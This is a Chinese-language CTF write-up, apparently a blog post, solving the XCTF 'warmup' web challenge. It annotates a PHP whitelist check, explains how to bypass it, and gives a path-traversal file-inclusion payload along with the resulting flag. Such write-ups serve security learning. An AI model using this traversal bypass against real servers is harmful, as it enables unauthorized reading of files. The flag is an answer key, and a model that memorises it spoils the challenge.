查看页面源代码,发现source.php
进入source.php,发现源代码
代码审计,分析
<?php
highlight_file(__FILE__); //高亮
class emmm //定义一个类
{
public static function checkFile(&$page)//检查函数
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//定义一个白名单
if (! isset($page) || !is_string($page)) { //变量不存在或者不是字符串,输入字符串即可绕过
echo "you can't see it";//打印你不能查看这个
return false;//返回false
}
if (in_array($page, $whitelist)) { //是否存在于$whitelist,存在即可绕过
return true;//返回ture
}
$_page = mb_substr( //截取字符串
$page,
0,
mb_strpos($page . '?', '?') //截取$page中?第一次出现之前的部分
);
if (in_array($_page, $whitelist)) {//这部分是否存在于$whitelist数组,是返回ture,保证截取?之前的是source或者hint或者source.php或者hint.php,即可绕过
return true;
}
$_page = urldecode($page); //url解密
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?') //截取$page中?第一次出现之前的部分
);
if (in_array($_page, $whitelist)) {//同上即可绕过
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file']) //输入的为非空,则ture
&& is_string($_REQUEST['file']) //输入的是字符串
&& emmm::checkFile($_REQUEST['file'])//执行检查函数
) {
include $_REQUEST['file'];//执行文件包含
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";//打印图片
}
?> 发现hint.php文件,访问告诉了flag的位置
显然我们要执行文件包含得到flag,文件包含的条件要满足最后一个if,
if (! empty($_REQUEST['file']) //输入的为非空,则ture
&& is_string($_REQUEST['file']) //输入的是字符串
&& emmm::checkFile($_REQUEST['file'])//执行检查函数前两个非常好满足,只要输入字符串就可,现在分析最后一个条件检查函数,绕过我已经写代码里了
这里我们只知道文件名并不知道路径,查阅资料
此处我们只要../够多就能找到,一般写五六个,找不到再加
构造payload:?file=source.php?/../../../../../../ffffllllaaaagggg
http://xxx.xxx.xxx/source.php?file=source.php?/../../../../../../ffffllllaaaagggg这里要注意,第一个问号是用来传递参数的,也可以是这样的payload(source.php也可以改成hint.php)
http://xxx.xxx.xxx/?file=source.php?/../../../../../../ffffllllaaaagggg带入得到flag:flag{25e7bce6005c4e0c983fb97297ac6e5a}
参考连接:(40条消息) 【XCTF高手进阶区】 web7_warmup writeup(一)_Mitch311的博客-CSDN博客
扫一扫
544
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
